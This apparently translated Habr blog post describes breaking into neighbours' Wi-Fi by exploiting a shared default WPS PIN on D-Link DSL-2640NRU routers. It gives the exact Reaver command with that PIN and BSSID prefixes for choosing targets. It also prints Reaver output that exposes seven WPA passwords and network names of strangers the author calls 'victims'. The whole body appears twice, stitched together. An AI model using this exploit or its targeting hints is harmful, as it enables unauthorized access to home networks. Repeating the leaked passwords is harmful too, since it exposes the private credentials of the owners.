Hack Wi-Fi in ... 3 seconds
What kind of person doesn't like freebies? Almost everyone simply adores her, and I am no exception. Inspired by the article “Hack Wi-Fi in 10 Hours,” I got BT5 hard, downloaded earlier, from the depths, and wrote it on a CD. The result was not long in coming, and the first password was received the next morning. And rushed ...
However, what was my surprise when the second victim had the same pin code as the first one (in particular, this one: 46264848). I note that the routers were the same, D'Link DSL 2640NRU, perhaps the most common model on the market. With the firmware version 1.0.10.
As a result, out of 6 devices (of which there were 5 D'Links) that came to me, 4 had identical pin codes, which, by the way, change after firmware and are restored after going back to 1.0.10. What's the matter: one batch of routers? One firmware? I don’t know, but the fact remains that the attack time on the lion’s share of routers can be reduced from 2-∞ hours to a few seconds, considering that most people do not care about the security of their network (because of their laziness or ignorance?).
To do this, just enter a specific pin-code in the Reaver command:
')
reaver -i mon0 -b xx: xx: xx: xx: xx: xx -p 46264848 -vv
In the bottom line we have:
Or so ...
[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '12316061989'
[+] AP SSID: 'Shat_SatyricoN'
[+] Pin cracked in 51 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3159801111'
[+] AP SSID: 'DOMIK'
[+] Pin cracked in 47 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '29051966'
[+] AP SSID: 'serg'
[+] Pin cracked in 17 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '19361'
[+] AP SSID: 'DSL_2640NRU'
[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3CQEPazxYCGY'
[+] AP SSID: 'Home'
[+] Pin cracked in 15 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'dimetriys80'
[+] AP SSID: 'DSL_2640NRU'
[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'ton_ton75'
[+] AP SSID: 'DSL_2640NRU'
(I hope the network owners do not read Habr)
BSSID routers, which should be tasted, most often begin with
B8: A3: 86
C8: BE: 19
1C: 7E: E5 (see the full list here )
I also note that the networks are often not renamed, and in the list of available ones, almost always there are several “DSL_2640NRUs” hanging.
However, what was my surprise when the second victim had the same pin code as the first one (in particular, this one: 46264848). I note that the routers were the same, D'Link DSL 2640NRU, perhaps the most common model on the market. With the firmware version 1.0.10.
As a result, out of 6 devices (of which there were 5 D'Links) that came to me, 4 had identical pin codes, which, by the way, change after firmware and are restored after going back to 1.0.10. What's the matter: one batch of routers? One firmware? I don’t know, but the fact remains that the attack time on the lion’s share of routers can be reduced from 2-∞ hours to a few seconds, considering that most people do not care about the security of their network (because of their laziness or ignorance?).
To do this, just enter a specific pin-code in the Reaver command:
')
reaver -i mon0 -b xx: xx: xx: xx: xx: xx -p 46264848 -vv
In the bottom line we have:
Or so ...
[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '12316061989'
[+] AP SSID: 'Shat_SatyricoN'
[+] Pin cracked in 51 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3159801111'
[+] AP SSID: 'DOMIK'
[+] Pin cracked in 47 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '29051966'
[+] AP SSID: 'serg'
[+] Pin cracked in 17 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '19361'
[+] AP SSID: 'DSL_2640NRU'
[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3CQEPazxYCGY'
[+] AP SSID: 'Home'
[+] Pin cracked in 15 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'dimetriys80'
[+] AP SSID: 'DSL_2640NRU'
[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'ton_ton75'
[+] AP SSID: 'DSL_2640NRU'
(I hope the network owners do not read Habr)
BSSID routers, which should be tasted, most often begin with
B8: A3: 86
C8: BE: 19
1C: 7E: E5 (see the full list here )
I also note that the networks are often not renamed, and in the list of available ones, almost always there are several “DSL_2640NRUs” hanging.
Source: https://habr.com/ru/post/151688/
All Articles